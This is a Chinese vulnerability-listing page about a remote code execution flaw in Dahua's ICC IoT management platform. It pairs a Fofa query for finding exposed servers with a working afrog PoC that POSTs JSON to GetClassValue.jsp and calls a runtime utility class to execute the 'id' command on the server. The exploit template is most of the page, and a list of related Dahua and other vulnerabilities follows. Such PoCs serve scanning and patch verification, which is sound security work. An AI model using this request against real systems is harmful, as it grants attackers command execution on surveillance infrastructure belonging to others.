dahua-icc-getclassvalue-rce: 大华 ICC 智能物联综合管理平台 GetClassValue RCE

日期: 2025-09-01 | 影响软件: 大华ICC智能物联综合管理平台 | POC: 已公开

漏洞描述

大华智能物联综合管理平台GetClassValue.jsp存在远程代码执行漏洞，攻击者可获取服务器权限 Fofa: app="dahua-智能物联综合管理平台"

PoC代码[已公开]

id: dahua-icc-getclassvalue-rce

info:
  name: 大华 ICC 智能物联综合管理平台 GetClassValue RCE
  author: avic123
  severity: critical
  verified: true
  description: |-
    大华智能物联综合管理平台GetClassValue.jsp存在远程代码执行漏洞，攻击者可获取服务器权限
    Fofa: app="dahua-智能物联综合管理平台"
  reference:
    - https://cn-sec.com/archives/3585607.html
  tags: dahua,icc,rce
  created: 2025/01/06

rules:
  r0:
    request:
      method: POST
      path: /evo-apigw/admin/API/Developer/GetClassValue.jsp
      headers:
        Content-Type: application/json
      body: |
        {
          "data": {
            "clazzName": "com.dahua.admin.util.RuntimeUtil",
            "methodName": "syncexecReturnInputStream",
            "fieldName": ["id"]
          }
        }
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-getclassvalue-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

dahua-icc-backdoor-user: 大华 ICC 智能物联综合管理平台后门用户 POC

大华ICC智能物联综合管理平台env敏感信息泄露 无POC

dahua-icc-sysusers-random-fastjson-rce: 大华ICC智能物联综合管理平台存在fastjson漏洞 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

大华ICC智能物联综合管理平台env敏感信息泄露无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC